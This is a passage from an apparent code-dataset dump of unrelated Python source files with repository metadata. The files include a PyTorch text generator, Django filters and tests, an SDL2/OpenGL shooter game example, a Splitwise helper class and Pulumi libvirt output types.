input = torch.randint(ntokens, (1, 1), dtype=torch.long).to(device) # Represents the first word, which is randomly selected.
if args.primer:
with open(args.outf, 'w') as outf:
outf.write(args.primer + ' ')
primer_words = args.primer.split()
for word in primer_words:
word_idx = corpus.dictionary.word2idx[word]
input.fill_(word_idx)
_output, hidden = model(input, hidden)
with open(args.outf, 'ab') as outf:
with torch.no_grad(): # no tracking history
for i in range(args.words):
output, hidden = model(input, hidden)
word_weights = output.squeeze().div(args.temperature).exp().cpu()
word_idx = torch.multinomial(word_weights, 1)[0]
input.fill_(word_idx)
word = corpus.dictionary.idx2word[word_idx]
outstr = word + ('\n' if i % 20 == 19 else ' ')
outf.write(outstr.encode('utf-8'))
if i % args.log_interval == 0:
print('| Generated {}/{} words'.format(i, args.words))
| 38.573171
| 124
| 0.606386
|
5afb3c1cdcb33f01f49d9b9751845396ec41aa76
| 87
|
py
|
Python
|
tests/periodicities/Second/Cycle_Second_1600_S_5.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
tests/periodicities/Second/Cycle_Second_1600_S_5.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | 1
|
2019-11-30T23:39:38.000Z
|
2019-12-01T04:34:35.000Z
|
tests/periodicities/Second/Cycle_Second_1600_S_5.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
import pyaf.tests.periodicities.period_test as per
per.buildModel((5 , 'S' , 1600));
| 17.4
| 50
| 0.724138
|
6b9a2af2893514a1813cbe2dfb590a11af5b04e0
| 689
|
py
|
Python
|
src/wellsfargo/templatetags/wfrs_filters.py
|
thelabnyc/django-oscar-wfrs
|
9abd4ecbdafd597407fdf60657103cb5d29c4c8b
|
[
"0BSD"
] | 1
|
2021-02-08T05:54:56.000Z
|
2021-02-08T05:54:56.000Z
|
src/wellsfargo/templatetags/wfrs_filters.py
|
thelabnyc/django-oscar-wfrs
|
9abd4ecbdafd597407fdf60657103cb5d29c4c8b
|
[
"0BSD"
] | 24
|
2019-12-04T21:37:01.000Z
|
2022-03-11T23:16:20.000Z
|
src/wellsfargo/templatetags/wfrs_filters.py
|
thelabnyc/django-oscar-wfrs
|
9abd4ecbdafd597407fdf60657103cb5d29c4c8b
|
[
"0BSD"
] | 2
|
2016-05-31T10:02:35.000Z
|
2016-12-19T11:29:37.000Z
|
from django.utils.translation import ugettext as _
from django import template
import pytz
register = template.Library()
@register.filter(name="timeat")
def timeat(value):
try:
return _("%(years)s years, %(months)s months") % dict(
years=int(value[2:]), months=int(value[:2])
)
except Exception:
return ""
@register.filter(name="timesinceminutes")
def timesinceminutes(dt_to, dt_from):
if not dt_to or not dt_from:
return ""
return round((dt_to - dt_from).total_seconds() / 60)
@register.filter(name="localizedatetime")
def localizedatetime(value):
if not value:
return ""
return pytz.utc.localize(value)
| 22.225806
| 62
| 0.66328
|
db71a7c87f0878c7a4975f501b0574afdd082384
| 530
|
py
|
Python
|
example_project/testapp/tests.py
|
lincolnloop/django-activity-stream
|
b1b4884624fab982b35fbcbd28ed321d12e3d054
|
[
"BSD-3-Clause"
] | null | null | null |
example_project/testapp/tests.py
|
lincolnloop/django-activity-stream
|
b1b4884624fab982b35fbcbd28ed321d12e3d054
|
[
"BSD-3-Clause"
] | null | null | null |
example_project/testapp/tests.py
|
lincolnloop/django-activity-stream
|
b1b4884624fab982b35fbcbd28ed321d12e3d054
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime
from django.test import TestCase
from django.contrib.auth.models import User
from actstream.models import Action
from actstream.signals import action
class TestAppTests(TestCase):
def setUp(self):
self.user = User.objects.create(username='test')
action.send(self.user, verb='was created')
def test_accessor(self):
self.assertEqual(len(Action.objects.testfoo(self.user)), 1)
self.assertEqual(len(Action.objects.testfoo(self.user, datetime(1970, 1, 1))), 0)
| 31.176471
| 89
| 0.732075
|
f45cd58c3abf6095cc23977e04ce5a1f9a6f2d03
| 14,054
|
py
|
Python
|
example.py
|
fdkz/libcopengl
|
e796abd7d8cede5b5f7aff92b815bd2b6f29b1da
|
[
"MIT"
] | null | null | null |
example.py
|
fdkz/libcopengl
|
e796abd7d8cede5b5f7aff92b815bd2b6f29b1da
|
[
"MIT"
] | null | null | null |
example.py
|
fdkz/libcopengl
|
e796abd7d8cede5b5f7aff92b815bd2b6f29b1da
|
[
"MIT"
] | 1
|
2021-12-14T11:32:20.000Z
|
2021-12-14T11:32:20.000Z
|
import logging
logg = logging.getLogger(__name__)
if __name__ == "__main__":
logging.basicConfig(level=logging.NOTSET, format="%(asctime)s %(name)s %(levelname)-5s: %(message)s")
import sys
import time
import math
import random
import ctypes
from sdl2 import *
# uncomment these to use pyopengl
#from OpenGL.GL import *
#glTranslatef = glTranslate
from copengl import *
class FpsCounter:
def __init__(self, update_interval_seconds=0.5):
""" read self.fps for output """
self.fps = 0.
self.interval = update_interval_seconds
self._counter = 0.
self._age = 0.
self._last_output_age = 0.
def tick(self, dt):
self._age += dt
self._counter += 1.
if self._age > self.interval:
self.fps = self._counter / self._age
self._age = 0.
self._counter = 0.
class Explosion:
def __init__(self, x, y, direction, v):
self.x, self.y = x, y
self.direction = direction
self.v = v
self.age = 0.
self.dead = False
self.r = 0.
self.lifetime = 0.6
self.turndirection = direction
def render(self):
self.sideangle = 140.
a = math.radians(self.direction + self.turndirection)
x1, y1 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
a = math.radians(self.direction + self.turndirection + self.sideangle)
x2, y2 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
a = math.radians(self.direction + self.turndirection - self.sideangle)
x3, y3 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
glColor4d(1., 0.3, 0.2, 1. - self.age / self.lifetime)
glBegin(GL_TRIANGLE_FAN)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
glColor4d(0.4, 0., 0., 1. - self.age / self.lifetime)
glBegin(GL_LINE_LOOP)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
def tick(self, dt):
self.r += dt * 8.
self.x += self.v * math.sin(math.radians(self.direction)) * dt
self.y += self.v * math.cos(math.radians(self.direction)) * dt
self.age += dt
self.turndirection += dt * 1500.
if self.age > self.lifetime:
self.dead = True
class Bullet:
def __init__(self, x, y, direction, v, owner):
self.x, self.y = x, y
self.direction = direction
self.v = v
self.age = 0.
self.r = 0.5
self.dead = False
self.owner = owner
def render(self):
a = math.radians(self.direction)
x2, y2 = self.x, self.y
x1, y1 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
glShadeModel(GL_SMOOTH)
glBegin(GL_LINES)
glColor4d(0.3, 0.2, 0.1, 1.)
glVertex3d(x1, y1, 0.)
glColor4d(0.3, 0.2, 0.1, 0.)
glVertex3d(x2, y2, 0.)
glEnd()
def tick(self, dt):
self.x += self.v * math.sin(math.radians(self.direction)) * dt
self.y += self.v * math.cos(math.radians(self.direction)) * dt
self.age += dt
if self.age > 3.:
self.dead = True
class Crawly:
def __init__(self, x, y):
self.x, self.y = x, y
self.v = 0.
self.acc = 0.
self.direction = 0.
self.leglen = 0.5*1.5
self.legs = [[0., 0.] for i in range(10)]
self.legs2 = [[0., 0.] for i in range(10)]
self._place_legs()
self._place_legs2()
# feedback variables
self.direction_new = 0.
# 0 - default. red
# 1 - friend. green
# 2 - unknown. blue
self.color = 0.
self.speedlimit = 5.
self.r = 0.3
self.influence_radius = 1.0
self.sideangle = 140.
self.dead = False
self.age = 0.
self.randomstarttime = random.random() * 10.
self.randomheartbeatspeed = (random.random() + 0.5) * 13.
def _place_legs(self):
side = -1.
for i, l in enumerate(self.legs):
side = -side
if math.hypot(self.x - l[0], self.y - l[1]) > self.leglen + 0.1:
# calc new leg position
y = int(i / 2) + 1
l[0] = self.x + math.sin(math.radians(self.direction - 8. * y * side)) * self.leglen
l[1] = self.y + math.cos(math.radians(self.direction - 8. * y * side)) * self.leglen
def _place_legs2(self):
side = -1.
for i, l2 in enumerate(self.legs2):
# calc new leg position
y = int(i / 2) + 1
l = self.legs[i]
l2[0] = self.x + (l[0] - self.x) / 2. + math.sin(math.radians(self.direction)) * self.leglen * .2
l2[1] = self.y + (l[1] - self.y) / 2. + math.cos(math.radians(self.direction)) * self.leglen * .2
def tick(self, dt):
self.age += dt
damping = 0.999
self.direction = self.direction_new
dx = math.sin(math.radians(self.direction))
dy = math.cos(math.radians(self.direction))
dv = self.acc * dt
self.v += dv
if self.v > self.speedlimit:
self.v = self.speedlimit
self.x += dx * (self.v * dt + self.acc * dt * dt / 2.)
self.y += dy * (self.v * dt + self.acc * dt * dt / 2.)
self.acc = 0
self._place_legs()
self._place_legs2()
def _render_legs(self):
glBegin(GL_LINES)
glColor4d(0., 0., 0., 1.)
# use simple legs
#for l in self.legs:
# glVertex3d(self.x, self.y, 0.)
# glVertex3d(l[0], l[1], 0.)
for l in self.legs2:
glVertex3d(self.x, self.y, 0.)
glVertex3d(l[0], l[1], 0.)
for i, l in enumerate(self.legs):
l2 = self.legs2[i]
glVertex3d(l2[0], l2[1], 0.)
glVertex3d(l[0], l[1], 0.)
glEnd()
def render(self):
r = self.r + 0.05 * math.sin(self.age * self.randomheartbeatspeed + self.randomstarttime)
a = math.radians(self.direction)
x1, y1 = self.x + r * math.sin(a), self.y + r * math.cos(a)
a = math.radians(self.direction + self.sideangle)
x2, y2 = self.x + r * math.sin(a), self.y + r * math.cos(a)
a = math.radians(self.direction - self.sideangle)
x3, y3 = self.x + r * math.sin(a), self.y + r * math.cos(a)
self._render_legs()
if self.color == 0: glColor4d(1., 0.3, 0.2, 1.)
elif self.color == 1: glColor4d(0., 0.8, 0.2, 1.)
elif self.color == 2: glColor4d(0., 0., 1., 1.)
glBegin(GL_TRIANGLE_FAN)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
if self.color == 0: glColor4d(0.4, 0., 0., 1.)
else: glColor4d(0., 0., 0., 1.)
glBegin(GL_LINE_LOOP)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
# render the crawly influence area for debugging.
if 0:
glColor4d(0.7, 0.7, 0.7, 1.0)
glBegin(GL_LINE_LOOP)
for a in range(0, 360, 30):
x, y = self.x + self.influence_radius * math.sin(math.radians(a)), self.y + self.influence_radius * math.cos(math.radians(a))
glVertex(x, y, 0.)
glEnd()
class Circle:
def __init__(self, x, y, r, (red, g, b, a)):
self.x, self.y, self.r = x, y, r
self.red, self.g, self.b, self.a = red, g, b, a
def render(self):
glColor4d(self.red, self.g, self.b, self.a)
glBegin(GL_TRIANGLE_FAN)
for a in range(0, 360, 10):
x, y = self.x + self.r * math.sin(math.radians(a)), self.y + self.r * math.cos(math.radians(a))
glVertex3f(x, y, 0.)
glEnd()
glBegin(GL_LINE_LOOP)
for a in range(0, 360, 10):
x, y = self.x + self.r * math.sin(math.radians(a)), self.y + self.r * math.cos(math.radians(a))
glVertex3f(x, y, 0.)
glEnd()
class CrawlyWorld:
def __init__(self):
self.crawlys = [self.new_crawly() for i in range(30)]
self.crawlys[0].color = 1
self.crawlys[0].speedlimit = 9.
self.bullets = []
self.explosions = []
self.circles = []
self.init_circles()
def _set_projection(self, w, h, fov_x=90., z_near=1., z_far=50*1000.):
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
#gluPerspective(fov_x * float(h) / w, float(w) / h, z_near, z_far)
# make so that making the window larger will just bring more world to the view
d = 0.04
glOrtho(-w*d/2., w*d/2., -h*d/2., h*d/2., z_near, z_far)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def init_circles(self):
self.circles.append(Circle(-3, 0, 2, (0.5, 0.5, 0.4, 1.)))
self.circles.append(Circle(3, 1, 3, (0.5, 0.5, 1., 1.)))
self.circles.append(Circle(-8, 7, 2.4, (0.7, 0.2, 1., 1.)))
def new_crawly(self):
c = Crawly(random.randrange(-1000., 1000.) * .01, random.randrange(-1000., 1000.) * .01)
c.influence_radius = 2. - random.randrange(-10., 10.) * 0.01
c.speedlimit = 5. + random.randrange(-10., 10.) * 0.2
return c
def crawly_angle(self, crawly1, crawly2):
""" return angle between two creatures """
a = math.degrees(math.atan2(crawly1.x - crawly2.x, crawly1.y - crawly2.y))
offset, dummy = math.modf((a - crawly1.direction) / 360.)
offset *= 360.
if offset > 180.: offset -= 360.
if offset < -180.: offset += 360.
return offset
def crawly_turn_direction(self, crawly1, crawly2):
""" return in which direction the creature should turn in order to torn away from another """
a = self.crawly_angle(crawly1, crawly2)
if a < 0.: return 1.
return -1.
def tick(self, dt, keys):
speed = 11.5
turn_speed = 170.
p = self.crawlys[0]
if keys[SDL_SCANCODE_LEFT]: p.direction_new -= turn_speed * dt
if keys[SDL_SCANCODE_RIGHT]: p.direction_new += turn_speed * dt
if keys[SDL_SCANCODE_UP]: p.acc = speed * 0.6
if keys[SDL_SCANCODE_DOWN]: p.acc = -speed * 0.6
bullet_speed = 6.
if keys[SDL_SCANCODE_X]:
self.bullets.append(Bullet(p.x, p.y, p.direction + 5 * (random.random() - 0.5), bullet_speed + p.v, p))
# cleanup our object lists
self.bullets = [b for b in self.bullets if not b.dead]
self.explosions = [e for e in self.explosions if not e.dead]
self.crawlys = [c for c in self.crawlys if not c.dead]
# did bullets do any damage?
# line-circle intersection. just test the bullet start/end points and crawly radius.
for b in self.bullets:
for c in self.crawlys:
dist2 = (c.x - b.x) * (c.x - b.x) + (c.y - b.y) * (c.y - b.y)
if dist2 < c.r * c.r and b.owner is not c and not c.dead:
b.dead = True
c.dead = True
self.explosions.append(Explosion(c.x, c.y, c.direction, c.v))
self.crawlys.append(self.new_crawly())
bad_crawly_speed = 1.3
bad_crawly_turn_speed = 180.
# chase the player
for c in self.crawlys:
if c is not p:
c.acc = bad_crawly_speed * 1.3
c.direction_new += self.crawly_turn_direction(c, p) * bad_crawly_turn_speed * dt
# avoid eachother
# if distance if smaller than planned, then just steer away.
if True:
for c1 in self.crawlys:
for c2 in self.crawlys:
if c1 is not c2 and c1 is not p and c2:
dist2 = (c1.x - c2.x) * (c1.x - c2.x) + (c1.y - c2.y) * (c1.y - c2.y)
if dist2 < c1.influence_radius * c1.influence_radius:
a = self.crawly_angle(c2, c1)
if a > -90. and a < -90.: c1.v *= 0.9
d = 1. - dist2 / (c1.influence_radius * c1.influence_radius)
if a < 0.: c1.direction_new += bad_crawly_turn_speed * dt * 4. * d
else: c1.direction_new -= bad_crawly_turn_speed * dt * 4. * d
# avoid the shapes
if True:
for c in self.crawlys:
for circ in self.circles:
dist = math.hypot(c.x - circ.x, c.y - circ.y)
if dist < c.influence_radius * c.influence_radius:
a = self.crawly_angle(c, circ)
if a > -90. and a < -90.: c.v *= 0.9
d = 1. - dist / (c.influence_radius * circ.r)
if a < 0.: c.direction_new -= 2 * bad_crawly_turn_speed * dt * 4. * d
else: c.direction_new += 2 * bad_crawly_turn_speed * dt * 4. * d
for c in self.crawlys:
c.tick(dt)
for b in self.bullets:
b.tick(dt)
for e in self.explosions:
e.tick(dt)
def render(self, window_w, window_h):
glClearColor(0.8,0.8,1.8,1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
#glColor(1,0,0,1)
self._set_projection(window_w, window_h, 160)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glTranslatef(0., 0., -15.)
for c in self.circles:
c.render()
for c in self.crawlys:
c.render()
for b in self.bullets:
b.render()
for e in self.explosions:
e.render()
class Main:
def __init__(self):
self.w = 800
self.h = 600
self.crawlyworld = CrawlyWorld()
self.fpscounter = FpsCounter()
self.fps_log_time = time.time()
self.keys = None
def run(self):
if SDL_Init(SDL_INIT_VIDEO) != 0:
logg.error(SDL_GetError())
return -1
window = SDL_CreateWindow(b"copengl example", SDL_WINDOWPOS_UNDEFINED,
SDL_WINDOWPOS_UNDEFINED, self.w, self.h,
SDL_WINDOW_OPENGL | SDL_WINDOW_RESIZABLE)
if not window:
logg.error(SDL_GetError())
return -1
context = SDL_GL_CreateContext(window)
glClearColor(0., 0., 0., 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
if SDL_GL_SetSwapInterval(-1): # 0 to disable vsync
logg.error(SDL_GetError())
if SDL_GL_SetSwapInterval(1):
logg.error("SDL_GL_SetSwapInterval: %s", SDL_GetError())
logg.error("vsync failed completely. will munch cpu for lunch.")
self.keys = SDL_GetKeyboardState(None)
self._init_gl()
# init done. start the mainloop!
last_t = time.time()
event = SDL_Event()
running = True
while running:
while SDL_PollEvent(ctypes.byref(event)) != 0:
if event.type == SDL_QUIT:
running = False
if event.type == SDL_KEYDOWN:
if event.key.keysym.scancode == SDL_SCANCODE_ESCAPE:
running = False
if event.type == SDL_WINDOWEVENT:
if event.window.event == SDL_WINDOWEVENT_SIZE_CHANGED:
self.w, self.h = event.window.data1, event.window.data2
t = time.time()
self._render_frame(t - last_t)
last_t = t
SDL_GL_SwapWindow(window)
SDL_GL_DeleteContext(context)
SDL_DestroyWindow(window)
SDL_Quit()
def _render_frame(self, dt):
self.fpscounter.tick(dt)
glViewport(0, 0, self.w, self.h)
self.crawlyworld.tick(dt, self.keys)
self.crawlyworld.render(self.w, self.h)
t = time.time()
if self.fps_log_time + 2 < t:
logg.info("fps: %i", self.fpscounter.fps)
self.fps_log_time = t
def _init_gl(self):
glDisable(GL_TEXTURE_2D)
glDisable(GL_DEPTH_TEST)
glDisable(GL_FOG)
glDisable(GL_DITHER)
glDisable(GL_LIGHTING)
glShadeModel(GL_FLAT)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable(GL_LINE_SMOOTH)
glDisable(GL_LINE_STIPPLE)
if __name__ == "__main__":
logg.info("")
logg.info("------------------------------------")
logg.info("usage: press arrows and x")
logg.info("------------------------------------")
logg.info("")
w = Main()
sys.exit(w.run())
| 27.395712
| 129
| 0.636118
|
5a47fb075db191bc26a3f88ceb30acf3f7f8420c
| 1,334
|
py
|
Python
|
splitwise/picture.py
|
aayaffe/splitwise
|
477e0477bea9fc74693669c68431fe5ea0b08ef3
|
[
"MIT"
] | 105
|
2016-08-01T02:46:49.000Z
|
2022-02-11T21:08:48.000Z
|
splitwise/picture.py
|
aayaffe/splitwise
|
477e0477bea9fc74693669c68431fe5ea0b08ef3
|
[
"MIT"
] | 47
|
2016-08-27T05:09:52.000Z
|
2022-03-20T06:30:46.000Z
|
splitwise/picture.py
|
aayaffe/splitwise
|
477e0477bea9fc74693669c68431fe5ea0b08ef3
|
[
"MIT"
] | 43
|
2016-08-15T18:50:58.000Z
|
2022-03-27T19:45:03.000Z
|
class Picture(object):
""" Profile picture of the user.
Attributes:
small(str, optional): Link to small size picture
medium(str, optional): Link to medium size picture
large(str, optional): Link to large size picture
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing picture object
"""
if data:
self.medium = data["medium"]
if "small" in data:
self.small = data["small"]
else:
self.small = None
if "large" in data:
self.large = data["large"]
else:
self.large = None
def getSmall(self):
""" Returns the link to small size picture of the user
Returns:
str: Link to small size picture of the user
"""
return self.small
def getMedium(self):
""" Returns the link to medium size picture of the user
Returns:
str: Link to medium size picture of the user
"""
return self.medium
def getLarge(self):
""" Returns the link to large size picture of the user
Returns:
str: Link to large size picture of the user
"""
return self.large
| 26.68
| 82
| 0.532234
|
dcace7933866c4c8afa23c4b0e9e0f6e6b4c0fac
| 36,817
|
py
|
Python
|
sdk/python/pulumi_libvirt/outputs.py
|
pulumi/pulumi-libvirt
|
0a190bfea0981aff9e4bc0e1bfa91ee16c54bb38
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2021-04-29T14:33:35.000Z
|
2022-03-31T21:59:48.000Z
|
sdk/python/pulumi_libvirt/outputs.py
|
pulumi/pulumi-libvirt
|
0a190bfea0981aff9e4bc0e1bfa91ee16c54bb38
|
[
"ECL-2.0",
"Apache-2.0"
] | 28
|
2021-08-15T07:46:26.000Z
|
2022-03-31T15:30:59.000Z
|
sdk/python/pulumi_libvirt/outputs.py
|
pulumi/pulumi-libvirt
|
0a190bfea0981aff9e4bc0e1bfa91ee16c54bb38
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-12-17T23:11:19.000Z
|
2021-12-17T23:11:19.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
__all__ = [
'DomainBootDevice',
'DomainConsole',
'DomainCpu',
'DomainDisk',
'DomainFilesystem',
'DomainGraphics',
'DomainNetworkInterface',
'DomainNvram',
'DomainTpm',
'DomainVideo',
'DomainXml',
'NetworkDhcp',
'NetworkDns',
'NetworkDnsForwarder',
'NetworkDnsHost',
'NetworkDnsSrv',
'NetworkDnsmasqOptions',
'NetworkDnsmasqOptionsOption',
'NetworkRoute',
'NetworkXml',
'PoolXml',
'VolumeXml',
]
@pulumi.output_type
class DomainBootDevice(dict):
def __init__(__self__, *,
devs: Optional[Sequence[str]] = None):
if devs is not None:
pulumi.set(__self__, "devs", devs)
@property
@pulumi.getter
def devs(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "devs")
@pulumi.output_type
class DomainConsole(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "targetPort":
suggest = "target_port"
elif key == "sourceHost":
suggest = "source_host"
elif key == "sourcePath":
suggest = "source_path"
elif key == "sourceService":
suggest = "source_service"
elif key == "targetType":
suggest = "target_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainConsole. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainConsole.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainConsole.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
target_port: str,
type: str,
source_host: Optional[str] = None,
source_path: Optional[str] = None,
source_service: Optional[str] = None,
target_type: Optional[str] = None):
"""
:param str target_port: Target port
:param str type: Console device type. Valid values are "pty" and "tcp".
:param str source_host: IP address to listen on. Defaults to 127.0.0.1.
:param str source_path: Source path
:param str source_service: Port number or a service name. Defaults to a
random port.
:param str target_type: for the first console and defaults to `serial`.
Subsequent `console` blocks must have a different type - usually `virtio`.
"""
pulumi.set(__self__, "target_port", target_port)
pulumi.set(__self__, "type", type)
if source_host is not None:
pulumi.set(__self__, "source_host", source_host)
if source_path is not None:
pulumi.set(__self__, "source_path", source_path)
if source_service is not None:
pulumi.set(__self__, "source_service", source_service)
if target_type is not None:
pulumi.set(__self__, "target_type", target_type)
@property
@pulumi.getter(name="targetPort")
def target_port(self) -> str:
"""
Target port
"""
return pulumi.get(self, "target_port")
@property
@pulumi.getter
def type(self) -> str:
"""
Console device type. Valid values are "pty" and "tcp".
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="sourceHost")
def source_host(self) -> Optional[str]:
"""
IP address to listen on. Defaults to 127.0.0.1.
"""
return pulumi.get(self, "source_host")
@property
@pulumi.getter(name="sourcePath")
def source_path(self) -> Optional[str]:
"""
Source path
"""
return pulumi.get(self, "source_path")
@property
@pulumi.getter(name="sourceService")
def source_service(self) -> Optional[str]:
"""
Port number or a service name. Defaults to a
random port.
"""
return pulumi.get(self, "source_service")
@property
@pulumi.getter(name="targetType")
def target_type(self) -> Optional[str]:
"""
for the first console and defaults to `serial`.
Subsequent `console` blocks must have a different type - usually `virtio`.
"""
return pulumi.get(self, "target_type")
@pulumi.output_type
class DomainCpu(dict):
def __init__(__self__, *,
mode: str):
pulumi.set(__self__, "mode", mode)
@property
@pulumi.getter
def mode(self) -> str:
return pulumi.get(self, "mode")
@pulumi.output_type
class DomainDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "blockDevice":
suggest = "block_device"
elif key == "volumeId":
suggest = "volume_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
block_device: Optional[str] = None,
file: Optional[str] = None,
scsi: Optional[bool] = None,
url: Optional[str] = None,
volume_id: Optional[str] = None,
wwn: Optional[str] = None):
"""
:param str block_device: The path to the host device to use as the block device for this disk.
:param str file: The filename to use as the block device for this disk (read-only)
:param bool scsi: Use a scsi controller for this disk. The controller
model is set to `virtio-scsi`
:param str url: The http url to use as the block device for this disk (read-only)
:param str volume_id: The volume id to use for this disk.
:param str wwn: Specify a WWN to use for the disk if the disk is using
a scsi controller, if not specified then a random wwn is generated for the disk
"""
if block_device is not None:
pulumi.set(__self__, "block_device", block_device)
if file is not None:
pulumi.set(__self__, "file", file)
if scsi is not None:
pulumi.set(__self__, "scsi", scsi)
if url is not None:
pulumi.set(__self__, "url", url)
if volume_id is not None:
pulumi.set(__self__, "volume_id", volume_id)
if wwn is not None:
pulumi.set(__self__, "wwn", wwn)
@property
@pulumi.getter(name="blockDevice")
def block_device(self) -> Optional[str]:
"""
The path to the host device to use as the block device for this disk.
"""
return pulumi.get(self, "block_device")
@property
@pulumi.getter
def file(self) -> Optional[str]:
"""
The filename to use as the block device for this disk (read-only)
"""
return pulumi.get(self, "file")
@property
@pulumi.getter
def scsi(self) -> Optional[bool]:
"""
Use a scsi controller for this disk. The controller
model is set to `virtio-scsi`
"""
return pulumi.get(self, "scsi")
@property
@pulumi.getter
def url(self) -> Optional[str]:
"""
The http url to use as the block device for this disk (read-only)
"""
return pulumi.get(self, "url")
@property
@pulumi.getter(name="volumeId")
def volume_id(self) -> Optional[str]:
"""
The volume id to use for this disk.
"""
return pulumi.get(self, "volume_id")
@property
@pulumi.getter
def wwn(self) -> Optional[str]:
"""
Specify a WWN to use for the disk if the disk is using
a scsi controller, if not specified then a random wwn is generated for the disk
"""
return pulumi.get(self, "wwn")
@pulumi.output_type
class DomainFilesystem(dict):
def __init__(__self__, *,
source: str,
target: str,
accessmode: Optional[str] = None,
readonly: Optional[bool] = None):
pulumi.set(__self__, "source", source)
pulumi.set(__self__, "target", target)
if accessmode is not None:
pulumi.set(__self__, "accessmode", accessmode)
if readonly is not None:
pulumi.set(__self__, "readonly", readonly)
@property
@pulumi.getter
def source(self) -> str:
return pulumi.get(self, "source")
@property
@pulumi.getter
def target(self) -> str:
return pulumi.get(self, "target")
@property
@pulumi.getter
def accessmode(self) -> Optional[str]:
return pulumi.get(self, "accessmode")
@property
@pulumi.getter
def readonly(self) -> Optional[bool]:
return pulumi.get(self, "readonly")
@pulumi.output_type
class DomainGraphics(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "listenAddress":
suggest = "listen_address"
elif key == "listenType":
suggest = "listen_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainGraphics. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainGraphics.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainGraphics.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
autoport: Optional[bool] = None,
listen_address: Optional[str] = None,
listen_type: Optional[str] = None,
type: Optional[str] = None,
websocket: Optional[int] = None):
"""
:param bool autoport: defaults to "yes"
:param str listen_address: IP Address where the VNC listener should be started if
`listen_type` is set to `address`. Defaults to 127.0.0.1
:param str listen_type: "listen type", defaults to "none"
:param str type: Console device type. Valid values are "pty" and "tcp".
:param int websocket: Port to listen on for VNC WebSocket functionality (-1 meaning auto-allocation)
"""
if autoport is not None:
pulumi.set(__self__, "autoport", autoport)
if listen_address is not None:
pulumi.set(__self__, "listen_address", listen_address)
if listen_type is not None:
pulumi.set(__self__, "listen_type", listen_type)
if type is not None:
pulumi.set(__self__, "type", type)
if websocket is not None:
pulumi.set(__self__, "websocket", websocket)
@property
@pulumi.getter
def autoport(self) -> Optional[bool]:
"""
defaults to "yes"
"""
return pulumi.get(self, "autoport")
@property
@pulumi.getter(name="listenAddress")
def listen_address(self) -> Optional[str]:
"""
IP Address where the VNC listener should be started if
`listen_type` is set to `address`. Defaults to 127.0.0.1
"""
return pulumi.get(self, "listen_address")
@property
@pulumi.getter(name="listenType")
def listen_type(self) -> Optional[str]:
"""
"listen type", defaults to "none"
"""
return pulumi.get(self, "listen_type")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Console device type. Valid values are "pty" and "tcp".
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def websocket(self) -> Optional[int]:
"""
Port to listen on for VNC WebSocket functionality (-1 meaning auto-allocation)
"""
return pulumi.get(self, "websocket")
@pulumi.output_type
class DomainNetworkInterface(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "networkId":
suggest = "network_id"
elif key == "networkName":
suggest = "network_name"
elif key == "waitForLease":
suggest = "wait_for_lease"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainNetworkInterface. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainNetworkInterface.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainNetworkInterface.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
addresses: Optional[Sequence[str]] = None,
bridge: Optional[str] = None,
